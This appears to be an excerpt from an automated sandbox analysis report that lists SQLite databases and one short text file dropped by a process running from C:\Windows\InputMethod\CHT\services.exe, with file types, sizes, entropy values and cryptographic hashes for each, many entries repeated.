                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):25
                                                              Entropy (8bit):4.243856189774723
                                                              Encrypted:false
                                                              SSDEEP:3:kr8aZp:knX
                                                              MD5:038534B21727276EC4CDAA478BC7AC91
                                                              SHA1:24A64110F5A168E2BDE4E6F1A70310C04B89D321
                                                              SHA-256:211B7B14ADC1AF99BAEF282F22F27D986DEF5F22012F7BE7FFD9B35F78B9AA74
                                                              SHA-512:1CC38222B49D345ECFB3264F71DB7FAC88290302D856A56B71803F876852BBD535CFB2ADCA3EE5E5CFA4A81528195B4CFE19549E3EE3350CCA8966D842900118
                                                              Malicious:false
                                                              Preview:ahNr24FKT7rp1H2AsgGZ322lL
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
